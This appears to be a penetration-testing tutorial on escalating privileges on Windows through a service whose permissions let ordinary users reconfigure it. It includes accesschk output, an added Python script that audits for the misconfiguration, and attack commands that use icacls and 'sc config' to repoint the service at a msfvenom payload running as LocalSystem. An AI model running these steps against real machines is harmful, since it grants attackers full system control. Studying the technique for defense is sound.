Insecure service permission

This vulnerability stems from a misconfiguration of the service's permissions, rather than from the service's executable itself.

A service whose permissions allow us to change its configuration can be exploited by pointing it at an executable of our choosing.

The AccessChk tool can be used to view a service's permissions.

E.g., suppose there is a vulnerable service named vuln_service:

C:\> accesschk -qlc vuln_service
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        ...
  
  [4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_ALL_ACCESS

The output above shows that the BUILTIN\Users group has the SERVICE_ALL_ACCESS permission, which means that any user can configure the service.
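To audit for this misconfiguration, the accesschk -qlc output can be parsed and checked for principals outside the administrative set that hold rights permitting reconfiguration. The Python below is an added example, not part of the original page; the list of dangerous rights, the trusted-principal list and the sample output are assumptions constructed for illustration.

```python
import re

# Rights that let the holder change binPath/obj or rewrite the service ACL.
DANGEROUS = {"SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG",
             "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL", "GENERIC_WRITE"}
# Assumption: only these principals are expected to administer services.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\ADMINISTRATORS",
           "NT SERVICE\\TRUSTEDINSTALLER"}

ACE_HEADER = re.compile(r"^\s*\[\d+\]\s+(\w+):\s*(.+?)\s*$")
RIGHT = re.compile(r"^\s+([A-Z][A-Z_]+)\s*$")

def parse_allow_aces(text):
    """Map each principal to the rights granted by its allow ACEs."""
    aces, current = {}, None
    for line in text.splitlines():
        header = ACE_HEADER.match(line)
        if header:
            ace_type, principal = header.groups()
            # Deny ACEs grant nothing, so their rights are not collected.
            current = principal if ace_type == "ACCESS_ALLOWED_ACE_TYPE" else None
            if current:
                aces.setdefault(current, set())
        elif current and (right := RIGHT.match(line)):
            aces[current].add(right.group(1))
    return aces

def risky_aces(text):
    """Return {principal: [dangerous rights]} for principals outside TRUSTED."""
    findings = {}
    for principal, rights in parse_allow_aces(text).items():
        hits = sorted(rights & DANGEROUS)
        if hits and principal.upper() not in TRUSTED:
            findings[principal] = hits
    return findings

# Constructed sample in the shape of `accesschk -qlc vuln_service` output.
SAMPLE = r"""vuln_service
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  [1] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\INTERACTIVE
        SERVICE_QUERY_STATUS
        READ_CONTROL
  [2] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_ALL_ACCESS
"""

if __name__ == "__main__":
    for principal, rights in risky_aces(SAMPLE).items():
        print(f"{principal}: {', '.join(rights)}")
```

Any principal reported here should be reviewed and its rights on the service reduced to query and start/stop access where that is all it needs.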

After creating an executable payload with msfvenom and granting the appropriate permission on the created executable (usually full access (F) for the Everyone group), the executable and account associated with the vulnerable service can be updated.

To grant full access (F) to a binary for the Everyone group:

C:\> icacls [exec_binary] /grant Everyone:F

The following sets the executable associated with the vuln_service service to the attacker-created path, and the account to LocalSystem (highest privileged account available):

C:\> sc config vuln_service binPath= [path_to_exec_payload].exe obj= LocalSystem

Take note of the space after the equals sign (=) in the options passed to the sc command.